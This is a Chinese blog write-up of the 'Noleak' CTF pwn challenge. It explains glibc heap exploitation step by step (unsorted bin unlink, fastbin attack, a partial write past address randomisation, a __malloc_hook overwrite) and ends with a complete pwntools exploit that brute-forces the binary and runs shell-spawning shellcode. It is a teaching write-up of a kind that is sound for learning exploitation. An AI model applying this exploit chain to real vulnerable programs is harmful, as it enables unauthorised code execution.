攻防世界PWN之Noleak(一题学了好多知识)题解

最新推荐文章于 2023-09-12 22:21:27 发布
最新推荐文章于 2023-09-12 22:21:27 发布
阅读量3.6k 收藏 7
点赞数 9
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/103057937
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Noleak

本题需要用到的知识有:malloc_hookunsorted bin unlinkfastbin attackpartial write bypass PIE

 

首先,介绍一下malloc_hook,这是C语言提供的一个用来包装malloc的,类似还有free_hook,具体可以查阅相关资料学习

 

Malloc hook

我们看如下代码

  1. #include <stdio.h>  
  2. #include <malloc.h>  
  3.   
  4. void *fun() {  
  5.    __malloc_hook = NULL;  
  6.    printf("hello,fun was called!\n");  
  7.    return NULL;  
  8. }  
  9. int main() {  
  10.    __malloc_hook = fun;  
  11.    malloc(10);  
  12. }  

只要我们 __malloc_hook赋值为某个函数的地址,那么,当我们malloc时,系统就会去调用那个函数。

 

Unsorted bin unlink

Unsorted bin使用双向链表维护,假如在物理地址上,chunk0后面是chunk1,我们通过chunk0溢出到chunk1,并且还在chunk0里面伪造了一个chunk,其中fd和bk指向了我们的目标附近处,溢出修改chunk1的prev_size和size,让假的chunk伪装成free的状态,这样,当我们释放chunk1时就触发了unlink,使得chunk0的指针指向了我们的目标处,接下来,我们编辑chunk0,就是编辑目标处。关于unlink的详细知识,请看我之前的一篇博客https://blog.csdn.net/seaaseesa/article/details/102907138

本题,当我们free一个unsorted bin时,它的fd指针会指向libcmain_arena+88地址处,而该处的上方不远处,就是__malloc_hook

 

我们先创建一个256字节的堆,然后释放它,释放后的堆块数据结构是这样的,fd和bk设置成了main_arena+88的值

__malloc_hook

main_arena+88

我们的目的是修改__malloc_hook,让它指向指向我们的shellcode地址,这样,当我们malloc时,就会触发我们的shellcode执行。

fastbin attack

为了实现修改__malloc_hook处的数据,我们可以利用fastbin将堆块分配到此处,这样我们就能改写此处的数据了。

Fastbin只检查它单向链表中每个块的size域是否符合条件。我们可以__malloc_hook附近找一个可以伪造的块,想办法把这个块加入到fastbin的链表中,这样,当我们malloc分配时,就可以分配到这个块,这样我们就能修改__malloc_hook的数据了。

我们发现,__malloc_hook上方不远处有一个符合条件的区域

假如,我们的块从图中的0x 7F535F744AED处开始,那么0x 7F535F744AED + 8 = 7F535F744AF5正好是块的size域,由于size域是8字节空间,图中,它后面都是0,因此它的值就是7F,由于fastbin在malloc时,只检查size域,因此,我们可以把0x 7F535F744AED(注意这个地址是随机的,但是它位于__malloc_hook – 0x23,因此,我们可以来爆破,看下文partial write技术)链接到fastbin里,这样,我们重新分配时,就可以分配到这里。

partial write

前面的演示,我们知道了unsorted bin里最后一个块的fd会残留libc中main_arena+88的地址。(这里开启了另一个程序实例,所有里面的地址变了,不要在意)

由于内存的页载入机制,PIE的随机化只能影响到单个内存页。一般一个内存页大小为0x1000,这就意味着不管地址怎么变,某条指令的后3个十六进制数字的是始终不变的,与它在二进制文件中的地址后3个十六进制是一样的,从图中,我们可以看出,main_arenalibc2.23中的地址后三个数是B78

我们验证一下,以malloc_hook的地址为例,我们看到,它的静态地址是这样的

后三个数数B10

我们再看看它加载的地址

也是B10

也就是说,在同一个页里,就后2字节不一样,由于main_arena+ 88和__malloc_hook-0x23在同一个页里,现在我们已知后三个十六进制数字,那么我们只需爆破倒数第四个数字,即可得到__malloc_hook-0x23的地址。其实也不用爆破,我们就让倒数第4个数字固定,我们就假如它是2(随意),只要我们多次运行程序,总有一次地址正好吻合。

  1. attack_addr_suffix = 4096 * 2 + ((malloc_hook & 0xFFF) - 0x23)  

那么,我们需要把上面这个2字节覆盖到那个unsorted bin块的fd的低二字节,由于采用的是小端存储,正好可以覆盖,并且保留前面的字节数据。

如图,通过前一个块的溢出,我们修改了数据,我们跳过去看看

遗憾的是,这个地址不是我们的目标处,由于我们假定倒数的第四个数字是2,当前这一次,不走运,地址没有和假定吻合。但是,当我们不断重新运行程序,总有一次会吻合。那个时候我们就可以把__malloc_hook指向我们的shellcode,然后进行一次malloc操作即可getshell

好了,那我们正式解题吧

先看看保护机制(这一步应该放在最前面的,因为我们需要依据这个想办法)

RELRO 完全开启,意味着我们不能修改GOT表。NXPIE未开启,意味着我们可以在堆栈里存入shellcode,然后跳到那里去执行shellcode

先看看程序逻辑(delete功能没有把指针清空)

编辑功能存在UAF以及溢出漏洞,size未做检查,可以溢出堆,UAF也可以编辑堆,真是漏洞百出

我们决定把shellcode存到bss段0x601020处,因为没有开启PIE,它的地址固定

我们如何向这里写入数据呢?

我们需要先利用unsorted bin发生unlink,控制保存堆指针的数组。

  1. #chunk0  
  2. create(sh,0x100,'a'*0x100)  
  3. #chunk1  
  4. create(sh,0x100,'b'*0x100)  
  5. #我们首先需要来完成任意写的目的,这个地址处是一个数组,用来保存堆指针的。我们需要先控制这里  
  6. target_addr = 0x601040  
  7. #构造payload使得chunk0溢出到chunk1,修改chunk1prev_sizesize  
  8. #chunk  
  9. #prev_size size  
  10. payload = p64(0) + p64(0x101)  
  11. #fdbk  
  12. payload += p64(target_addr-0x18) + p64(target_addr - 0x10)  
  13. payload += 'a' * (0x100-8*4)  
  14. #修改chunk3prev_sizesize  
  15. payload += p64(0x100) + p64(0x110)  
  16.   
  17. edit(sh,0,len(payload),payload)  
  18. #发生unlink,chunk0的指针指向了保存堆指针的数组,那么我们就可以修改数组里的指针,让它们指向一些关键地方  
  19. delete(sh,1)  

不明白unlink的可以看我之前的博客里有详解https://blog.csdn.net/seaaseesa/article/details/102907138

 

发生了unlink,数组里,堆0的指针变成了0x601028,那么我们可以构造payload,从0x601028处溢出到下面,把数组里的几个指针全部修改成其他我们需要的地方,这样当我们编辑对应的堆时,就是编辑这些地址处的数据。比如,现在我们edit(0)就是在编辑0x601028处的数据。

  1. payload = p64(0) * 3  
  2. payload += p64(bss_addr)  
  3. #将堆0指针变成bss_addr,这样我们就可以往bss里写shellcode  
  4. edit(sh,0,len(payload),payload)  

接下来,我们要开始来实现如何修改malloc_hook了。

  1. #chunk2  
  2. create(sh,0x10,'c'*0x10)  
  3. #chunk3 这个必须是unsorted bin范围  
  4. create(sh,0x80,'d'*0x80)  
  5. #chunk4  
  6. create(sh,0x65,'e'*0x65)  
  7. #chunk5  
  8. create(sh,0x65,'f'*0x65)  
  9. #free chunk3后,chunk3fdbk残留了libc里面的main_area + 0x88指针  
  10. delete(sh,3)  
  11.   
  12. #覆盖低2字节,使得chunk3FD指向了malloc hook-0x23  
  13. create(sh,0x80,p16(attack_addr_suffix)) #chunk6  

chunk2用于溢出到chunk3,对chunk3进行修改。

我们要想实现将malloc_hook-0x23处链接到unsorted bin的链表中去,现在,假设我们覆盖chunk3的fd低2字节后,地址吻合了,那么malloc_hook-0x23已经连接到了chunk3的fd,那么我们就需要把chunk3加入到单向链表中去即可,那么我们需要通过chunk2溢出到chunk3修改chunk3的size域,使它在fastbin范围内,这里,我们就改成0x71吧

  1. payload = 'c'*0x10  
  2. payload += p64(0) + p64(0x71)  
  3. edit(sh,2,len(payload),payload)  

现在还有问题是,我们又不知道chunk3的地址,那么我们还需要再利用一次partial write

我们先释放chunk4、chunk5,这样,形成了以chunk5为头结点的fastbin单向链表,由于chunk4和chunk3在内存中是相邻的,并且他们的地址只有最后一字节不一样,由于最后一字节我们是可以得到的,只需用IDA观察即可

Chunk3

Chunk4

Chunk5的fd域

我们发现,chunk3chunk4的地址只有最后一个字节的差别,我们可以利用UAF漏洞,把chunk5fd的低1字节覆盖成0x30,这样,chunk5fd就指向了chunk3

  1. #释放chunk4chunk5,这样chunk5chunk4构成了fastbin单向链表  
  2. delete(sh,4)  
  3. delete(sh,5)  
  4. #我们覆盖chunk5fd的低1字节,目的是让chunk5fd指向chunk3,因为我们不确定chunk3的地址,当我们确定它地址的最后一个字节。  
  5. edit(sh,5,1,p8(0x30))  

这样操作以后,形成了这样的一个fastbin链表

Chunk5 chunk3 __malloc_hook-0x23

因此我们malloc三次后,就分配到了__malloc_hook-0x23处,我们就可以修改__malloc_hook了

由于程序会检测数组里指针的个数,超过10个就不给创建了,因此我们在bss段写入shellcode时,顺便把数组里覆盖为0

  1. #bss段写入shellcode,顺便把堆指针从数组里清空,这样我们又创建多个堆了,不然超过10个就不允许创建了  
  2. payload = shellcode.ljust(0x20,'\x00')  
  3. payload += p64(0) * 8  
  4. edit(sh,0,len(payload),payload)  

我们最终完整的exp脚本

  1. #coding:utf8  
  2. from pwn import *  
  3.   
  4. context(os='linux',arch='amd64')  
  5.   
  6. elf = ELF('./timu')  
  7. libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')  
  8.   
  9. #bss段,我们待会把shellcode写入这里  
  10. bss_addr = 0x601020  
  11. #我们的目的是把__malloc_hook指向bss_addr,这样,当我们malloc,我们在bss里放的代码被调用  
  12. #从而getshell  
  13. malloc_hook = libc.symbols['__malloc_hook']  
  14. #我们的攻击目标,我们利用fastbin,想办法让堆分配到malloc_hook地址-0x23  
  15. #由于不能泄露地址,但是由于PIE的缺陷,符号的地址的后3个十六进制数字和它在  
  16. #二进制文件中的地址的后三个十六进制数是一样的。然后,我们就直接设定倒数第  
  17. #个十六进制数字为2,这样,我们不断爆破,总有一次,它的后4个十六进制数字为  
  18. #这个  
  19. attack_addr_suffix = 4096 * 2 + ((malloc_hook & 0xFFF) - 0x23)  
  20.   
  21. #shellcode  
  22. shellcode = asm(shellcraft.sh())  
  23.   
  24. def create(sh,size,content):  
  25.    sh.sendlineafter('Your choice :','1')  
  26.    sh.sendlineafter('Size: ',str(size))  
  27.    sh.sendafter('Data: ',content)  
  28.   
  29. def edit(sh,index,size,content):  
  30.    sh.sendlineafter('Your choice :','3')  
  31.    sh.sendlineafter('Index: ',str(index))  
  32.    sh.sendlineafter('Size: ',str(size))  
  33.    sh.sendafter('Data: ',content)  
  34.   
  35. def delete(sh,index):  
  36.    sh.sendlineafter('Your choice :','2')  
  37.    sh.sendlineafter('Index: ',str(index))  
  38.   
  39.   
  40. def crack(sh):  
  41.    #chunk0  
  42.    create(sh,0x100,'a'*0x100)  
  43.    #chunk1  
  44.    create(sh,0x100,'b'*0x100)  
  45.    #我们首先需要来完成任意写的目的,这个地址处是一个数组,用来保存堆指针的。我们需要先控制这里  
  46.    target_addr = 0x601040  
  47.    #构造payload使得chunk0溢出到chunk1,修改chunk1prev_sizesize  
  48.    #chunk  
  49.    #prev_size size  
  50.    payload = p64(0) + p64(0x101)  
  51.    #fdbk  
  52.    payload += p64(target_addr-0x18) + p64(target_addr - 0x10)  
  53.    payload += 'a' * (0x100-8*4)  
  54.    #修改chunk3prev_sizesize  
  55.    payload += p64(0x100) + p64(0x110)  
  56.   
  57.    edit(sh,0,len(payload),payload)  
  58.    #发生unlink,chunk0的指针指向了保存堆指针的数组,那么我们就可以修改数组里的指针,让它们指向一些关键地方  
  59.    delete(sh,1)  
  60.    payload = p64(0) * 3  
  61.    payload += p64(bss_addr)  
  62.    #将堆0指针变成bss_addr,这样我们就可以往bss里写shellcode  
  63.    edit(sh,0,len(payload),payload)  
  64.   
  65.    #chunk2  
  66.    create(sh,0x10,'c'*0x10)  
  67.    #chunk3 这个必须是unsorted bin范围  
  68.    create(sh,0x80,'d'*0x80)  
  69.    #chunk4  
  70.    create(sh,0x65,'e'*0x65)  
  71.    #chunk5  
  72.    create(sh,0x65,'f'*0x65)  
  73.    #free chunk3后,chunk3fdbk残留了libc里面的main_area + 0x88指针  
  74.    delete(sh,3)  
  75.   
  76.    #覆盖低2字节,使得chunk3FD指向了malloc hook-0x23  
  77.    create(sh,0x80,p16(attack_addr_suffix)) #chunk6  
  78.    #修改chunk3size,目的是让chunk3chunk5chunk4size一样  
  79.    payload = 'c'*0x10  
  80.    payload += p64(0) + p64(0x71)  
  81.    edit(sh,2,len(payload),payload)  
  82.    #释放chunk4chunk5,这样chunk5chunk4构成了fastbin单向链表  
  83.    delete(sh,4)  
  84.    delete(sh,5)  
  85.    #我们覆盖chunk5fd的低1字节,目的是让chunk5fd指向chunk3,因为我们不确定chunk3的地址,当我们确定它地址的最后一个字节。  
  86.    edit(sh,5,1,p8(0x30))  
  87.   
  88.    #bss段写入shellcode,顺便把堆指针从数组里清空,这样我们又创建多个堆了,不然超过10个就不允许创建了  
  89.    payload = shellcode.ljust(0x20,'\x00')  
  90.    payload += p64(0) * 8  
  91.    edit(sh,0,len(payload),payload)  
  92.   
  93.    #chunk7  
  94.    create(sh,0x65,'g'*0x65)  
  95.    #chunk8  
  96.    create(sh,0x65,'h'*0x65)  
  97.   
  98.    payload = 'a'*0x13 + p64(bss_addr)  
  99.    #这个堆的指针指向了__malloc hook,我们修改它的值为bss_addr,这样,当我们再次malloc时,就会调用bss_addr处的shellcode  
  100.    create(sh,0x65,payload) #chunk9  
  101.    #当我们再次malloc时,malloc hook执行的函数被调用,我们getshell  
  102.    sh.sendlineafter('Your choice :','1')  
  103.    sh.sendlineafter('Size: ','1')  
  104.    sh.interactive()  
  105.   
  106. #爆破  
  107. while True:  
  108. #   sh = remote('111.198.29.45',59617)  
  109.    sh = process('./timu')  
  110.    try:  
  111.       print '正在爆破...'  
  112.       crack(sh)  
  113.       break  
  114.    except:  
  115.       sh.close()  

成功getshell

ha1vk
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
m0_73756460的博客
07-10 170
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
glibc中malloc源码分析
weixin_43044226的博客
06-25 863
了这么久堆漏洞了,我想应该把的和源码解析写一下了,希望能帮助一下刚上路的师傅,同时也巩固一下自身知识。我们平时写程序的时候,某些变量可能需要在开始就分配内存,这些内存是不可避免的。那么这些内存就是静态分配的,当程序编译完成之后,它就确定了占用这么多的内存。但是有时候,实际问题的规模没有预期那么大,我们不一定需要很大的内存,如果每次都按最大考虑那么就有很大一部分内存是被浪费的,这就是静态分配内存的弊端,虽然咱打acm的时候都是静态分配的,但是这没啥,因为每个问题不要超过它的总内存上限问题就不大(狗头。但是在
pwn 堆溢出之 泄露基址
qq_41071646的博客
04-25 2788
先声明一下本文的参考链接 https://blog.csdn.net/weixin_34050005/article/details/86881709?tdsourcetag=s_pctim_aiomsg 这篇博客写的非常好 受教了 本来其实我是看的另一道题 但是那道题 感觉并不是很适合我这种萌新 然后我就看到了这道题 就 由于这个篇文章写的很清楚 而且 代码直接就可以拿到f...
2023SICTF ROUND2 baby_heap
臭nana的博客
09-12 340
就是在申请堆块的时候会先从small bin中找有没有空闲的堆块,其中的bin,是根据main_arena和上申请堆块大小在small bin中的索引得到的,其实也是main_arena+xx,所以可以修改伪造其中有堆块,需要满足victim->bk->fd==victim,所以在堆上伪造就行了,有点像unlink,但是比它简单,最后就是和思路一样了,前面的思路也一样。思路三:在unsorted bin中伪造一个fake chunk,需要满足的条件是。
攻防世界(pwn)Noleak
PLpa的博客
03-03 1471
前言: 看了大佬们的writeup,发现这题解法真的非常多,我这里用的是unsortedbin的地址写漏洞,详情可以看ctfwiki了解漏洞原因。 没开NX,有可以执行的堆栈,但是开启了Full RELRO,不能修改got表地址了。 打开IDA: 发现是一个菜单题,可以创建,删除,更新堆快信息,没有输出信息的选项,果然Noleak。 我们这里可以一个一个功能去看,看看漏洞存在哪里: 经过观察...
漏洞挖掘——__lib_malloc函数、_int_malloc函数、__lib_free函数源码详解
董哥的黑板报
08-10 4430
_int_malloc函数介绍 当我们在应用层调用malloc申请堆的时候,在glibc中实际上调用的是_lib_malloc函数,但是_lib_malloc函数只是用来简单的封装_int_malloc函数的,_int_malloc函数才是申请堆的核心函数 _int_malloc会根据应用层用户申请的内存块大小,从而分配相应的chunk给用户使用 函数的分配堆内存的主要执行流程: ①请求...
[V&N2020 公开赛]simpleHeap-记录一次gef调试过程
qq_40712959的博客
10-24 800
[V&N2020 公开赛]simpleHeap 安全机制: IDA反汇编 main: Add: Edit: 可以看到get_input_content函数包含一个off_by_one漏洞。 Show: Delete 可以看到free函数之后,将chunkptr置为0,所以不存在UAF 思路: 利用off-by-one漏洞,篡改chunk的size大小,使被篡改大小的chunk覆盖其后已申请的chunk大小,从而导致chunk overlapping
hitcontraining_lab14习(以及Unsorted Bin的个人理解
a2590035252的博客
09-16 1393
适合和我一样的菜鸡pwner
快速入门堆溢出技巧(OFF BY ONE)
wulanlin的博客
01-11 589
OFF BY ONE 所谓OFF BY ONE就是利用堆溢出一个字节到下一个堆块,使得目前堆块与下一堆块合并成一个堆块,此时堆块的大小就是我们溢出的那一字节 并且堆块的fd(前驱指针)以及bk(后继指针)都会指向 main_arena+88的地址这也是我们泄露出来的地址 利用gdb 输入libc查看基地址,main_arena+88-libc=offset UNSORTERBIN&FASTBINS 在堆块的bins中分为fastbins,largebins,smallbins还有今天要用
how2heap 深入习(3)
CoLin的pwn小屋
03-06 2307
how2heap
攻防世界pwn题:forgot.doc
07-13
攻防世界pwn题:forgot.doc
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
warmup pwn入门题
02-11
pwn入门题
ASP.NET教务信息管理系统的设计与实现(源代码+论文).rar
04-17
计算机毕业设计,含源码
清新大气时尚简约论文答辩,通用模版(静态)691012.pptx.zip
04-17
清新大气时尚简约论文答辩,通用模版(静态)691012.pptx
清爽简约论文答辩模板.ppt.zip
最新发布
04-17
清爽简约论文答辩模板.ppt
内蒙古自治区各地级市市辖区数据1999-2022人均GDP建成区居住用地道路面积供用水燃气财政收支就业参保人数医院床位等.xls
04-17
数据来源:中经数据库 主要指标110多个(全部都是纯粹的 市辖区 指标),大致是: GDP GDP增速 第一产业增加值占GDP比重 第二产业增加值占GDP比重 第三产业增加值占GDP比重 人均GDP 社会消费品零售总额 固定资产投资(不含农户) 新设外商投资企业数_外商直接投资 实际利用外资金额(美元) 一般公共预算收入 一般公共预算支出 一般公共预算支出_教育 一般公共预算支出_科技术 金融机构人民币各项存款余额_个人储蓄存款 金融机构人民币各项存款余额 金融机构人民币各项贷款余额 规模以上工业企业单位数 规模以上工业企业单位数_内资企业 规模以上工业企业单位数_港澳台商投资企业 规模以上工业企业单位数_外商投资企业 规模以上工业总产值 规模以上工业总产值_内资企业 规模以上工业总产值_港澳台商投资企业 规模以上工业总产值_外商投资企业 规模以上工业企业流动资产合计 规模以上工业企业固定资产合计 规模以上工业企业利润总额 规模以上工业企业应交增值税 规模以上工业企业主营业务税金及附加 户籍人口数 年均户籍人口数 户籍人口自然增长率 第一产业就业人员占全部城镇单位就业人员比重 第二产业就业人员占全部城镇单位就业人员比重 第三产业就业人员占全部城镇单位就业人员比重 城镇非私营单位就业人员数 城镇非私营单位就业人员数_第一产业 城镇非私营单位就业人员数_第二产业 城镇非私营单位就业人员数_第三产业 城镇非私营单位就业人员数_农、林、牧、渔业 城镇非私营单位就业人员数_采矿业 城镇非私营单位就业人员数_制造业 城镇非私营单位就业人员数_电力、热力、燃气及水生产和供应业 城镇非私营单位就业人员数_建筑业 城镇非私营单位就业人员数_批发和零售业 城镇非私营单位就业人员数_交通运输、仓储和邮政业 城镇非私营单位就业人员数_住宿和餐饮业 城镇非私营单位就业人员数_信息传输、软件和信息技术服务业 城镇非私营单位就业人员数_金融业 城镇非私营单位就业人员数_房地产业 城镇非私营单位就业人员数_租赁和商务服务业 城镇非私营单位就业人员数_科研究和技术服务业 城镇非私营单位就业人员数_水利、环境和公共设施管理业 城镇非私营单位就业人员数_居民服务、修理和其他服务业 城镇非私营单位就业人员数_教育 城镇非私营单位就业人员数_卫生和社会工作 城镇非私营单位就业人员数_文化、体育和娱乐业 城镇非私营单位就业人员数_公共管理、社会保障和社会组织 城镇非私营单位在岗职工平均人数 城镇就业人员数_私营企业和个体 城镇非私营单位在岗职工工资总额 城镇非私营单位在岗职工平均工资 城镇登记失业人员数 建成区面积 建设用地面积 建设用地面积_居住用地 液化石油气供气总量 液化石油气供气总量_居民家庭 人工煤气、天然气供气总量 人工煤气、天然气供气总量_居民家庭 液化石油气用气人口 人工煤气、天然气用气人口 城市公共汽电车运营车辆数 城市出租汽车运营车辆数 城市公共汽电车客运总量 道路面积 排水管道长度 建成区绿化覆盖面积 建成区绿化覆盖率 绿地面积 公园绿地面积 维护建设资金支出 土地面积 生活用水供水量 供水总量 全社会用电量 城乡居民生活用电量 工业生产用电量 房地产开发投资 房地产开发投资_住宅 限额以上批发和零售业法人单位数 限额以上批发和零售业商品销售总额 普通中校数 中等职业教育校数 普通小校数 普通高等校专任教师数 普通中专任教师数 中等职业教育专任教师数 普通小专任教师数 普通高等校在校生数 普通中在校生数 中等职业教育在校生数 普通小在校生数 电视节目综合人口覆盖率 公共图书馆总藏量_图书 医疗卫生机构数_医院和卫生院 卫生人员数_执业(助理)医师 医疗卫生机构床位数_医院和卫生院 城镇职工基本养老保险参保人数 职工基本医疗保险参保人数 失业保险参保人数
攻防世界pwn新手题答案
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值